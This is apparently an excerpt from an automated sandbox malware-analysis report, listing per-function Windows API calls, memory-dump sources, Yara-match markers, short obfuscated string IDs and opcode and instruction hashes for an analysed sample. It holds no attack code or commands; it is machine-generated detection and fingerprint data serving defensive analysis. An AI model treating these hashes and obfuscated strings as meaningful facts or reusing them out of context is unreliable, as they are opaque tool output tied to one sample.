                                                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                        • Instruction Fuzzy Hash: 88414872900609AFDF26CF98CD84AEEBBB9BF4A305F148069F914B7215D335A960DF50
                                                        APIs
                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID: MOC$RCC
                                                        • API String ID: 2118026453-2084237596
                                                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                        • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                                                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                        • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                                                        APIs
                                                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                                                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                                                        • __Init_thread_footer.LIBCMT ref: 04931622
                                                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                                                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                        • String ID: BAOJ$JAY@
                                                        • API String ID: 4132704954-1137680417
                                                        • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                                                        • Instruction ID: aa2d1b6e0c986c3ca5647a3a311f188172e8752b98b06ac89f094f8ca670318c
                                                        • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                                                        • Instruction Fuzzy Hash: A52177B0F003448BE730DF79EC067A9B3A0FB56308FA48279D8445B271DBB52986CB09
                                                        APIs
                                                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                        • __Init_thread_footer.LIBCMT ref: 004013BB
                                                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                        • String ID: BAOJ$JAY@
                                                        • API String ID: 2296764815-1137680417
                                                        • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                                                        • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                                                        • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                                                        • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                                                        APIs
                                                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                                                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                                                        • __Init_thread_footer.LIBCMT ref: 04938755
                                                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                                                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                        • String ID: G@ZK$[@G_
                                                        • API String ID: 4132704954-2338778587
                                                        • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                                                        • Instruction ID: 0154eb31e13d0b26b83e0bc239a0b7ae8b8df5ca6d71fd6a65915dd517271d51
                                                        • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                                                        • Instruction Fuzzy Hash: E701F9B0F00244DFD720EFB8AC41A6DB7F0E75A311BA00579E536AB290DB75B805CB45
                                                        APIs
                                                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                                                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                                                        • __Init_thread_footer.LIBCMT ref: 04938155
                                                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                                                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                        • String ID: G@ZK$[@G_
                                                        • API String ID: 4132704954-2338778587
                                                        • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                                                        • Instruction ID: 9ea551ca2fead215ac669ace56642b0bd9c838ccf4462e8239b184284072030c
                                                        • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                                                        • Instruction Fuzzy Hash: 6B0126F0F41204DBD720EFA8AC40A69B7B0AB0A300FA005B9F41957360DB7568418B05
                                                        APIs
                                                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                        • __Init_thread_footer.LIBCMT ref: 004084EE
                                                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                        • String ID: G@ZK$[@G_
                                                        • API String ID: 2296764815-2338778587
                                                        • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                                                        • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                                                        • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                                                        • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                                                        APIs
                                                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                        • __Init_thread_footer.LIBCMT ref: 00407EEE
                                                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                        • String ID: G@ZK$[@G_
                                                        • API String ID: 2296764815-2338778587
                                                        • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                                                        • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                                                        • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                                                        • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                                                        APIs
                                                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                                                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                                                        • __Init_thread_footer.LIBCMT ref: 04937B00
                                                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                                                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                        • String ID: @G@K$A@K.
                                                        • API String ID: 4132704954-2457859030
                                                        • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                                                        • Instruction ID: e0730a36e8afa3d07c0736974fce8f83555064825c1ae38fedb564027ca1915c
                                                        • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                                                        • Instruction Fuzzy Hash: 7B0181B4F002049FC720DFA8E946A5C77B0E74A301FA041BAE916A7390D7B5AA458B59
                                                        APIs
                                                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                                                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                                                        • __Init_thread_footer.LIBCMT ref: 04937C10
                                                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                                                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                        • String ID: @G@K$ZYA.
                                                        • API String ID: 4132704954-4236202813
                                                        • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                                                        • Instruction ID: 293682d3647b3749e9bcb64460e5a7b7aefd87d9dd79a71121011ec3ad66b951
                                                        • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                                                        • Instruction Fuzzy Hash: 6101D1B4F00304DFCB24EFA8E991A4C7BF0BB45711F9040BAD82557390C6B97945CB49
                                                        APIs
                                                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                        • __Init_thread_footer.LIBCMT ref: 00407899
                                                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                        • String ID: @G@K$A@K.
                                                        • API String ID: 2296764815-2457859030
                                                        • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                                                        • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                                                        • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                                                        • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                                                        APIs
                                                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                        • __Init_thread_footer.LIBCMT ref: 004079A9
                                                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                        • String ID: @G@K$ZYA.
                                                        • API String ID: 2296764815-4236202813
                                                        • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                                                        • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                                                        • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                                                        • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D